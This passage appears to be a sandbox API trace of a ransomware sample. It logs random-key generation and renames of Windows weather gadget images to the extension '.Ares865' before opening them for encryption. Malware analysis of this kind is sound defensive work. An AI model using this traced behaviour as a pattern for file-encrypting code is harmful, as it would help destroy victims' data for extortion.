dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.519] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.519] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.519] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.Ares865") returned 98 [0116.519] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.521] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.522] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13161) returned 1 [0116.522] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.523] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.523] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.525] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.526] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.526] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.527] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.Ares865") returned 106 [0116.527] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.ares865"), dwFlags=0x1) returned 1 [0116.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.528] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12239) returned 1 [0116.528] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.529] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.529] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.532] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.533] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.533] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.533] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.Ares865") returned 99 [0116.533] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.ares865"), dwFlags=0x1) returned 1 [0116.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.537] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12841) returned 1 [0116.537] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.538] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.538] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.541] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.542] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.542] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.Ares865") returned 106 [0116.545] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8609) returned 1 [0116.546] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.547] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.547] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.550] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.551] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.551] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.Ares865") returned 97 [0116.552] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.553] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.553] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11939) returned 1 [0116.554] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.554] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.554] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.557] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.558] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.558] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.559] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.Ares865") returned 96 [0116.559] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png.ares865"), dwFlags=0x1) returned 1 [0116.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11493) returned 1 [0116.560] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.561] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.561] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.564] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.564] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.Ares865") returned 98 [0116.565] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png.ares865"), dwFlags=0x1) returned 1 [0116.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.567] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12998) returned 1 [0116.567] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.568] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.568] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.572] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.573] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.573] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.573] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.Ares865") returned 99 [0116.573] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.575] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10537) returned 1 [0116.575] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.576] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.576] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.579] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.580] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.580] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.Ares865") returned 104 [0116.580] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png.ares865"), dwFlags=0x1) returned 1 [0116.583] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10704) returned 1 [0116.583] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.584] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.584] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.587] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.587] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.587] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.588] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.Ares865") returned 98 [0116.588] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png.ares865"), dwFlags=0x1) returned 1 [0116.589] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10044) returned 1 [0116.590] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.591] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.591] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.594] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.594] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.594] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.Ares865") returned 97 [0116.595] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png.ares865"), dwFlags=0x1) returned 1 [0116.597] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.597] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12401) returned 1 [0116.597] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.598] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.598] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.603] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.604] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.604] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.Ares865") returned 98 [0116.605] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png.ares865"), dwFlags=0x1) returned 1 [0116.606] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.606] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12883) returned 1 [0116.606] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.607] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.607] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.610] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.611] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.611] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.Ares865") returned 97 [0116.612] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.613] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.614] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12974) returned 1 [0116.614] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.615] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.615] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.618] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.619] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.619] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.620] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.Ares865") returned 105 [0116.620] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png" (normalized: "c:\\program files 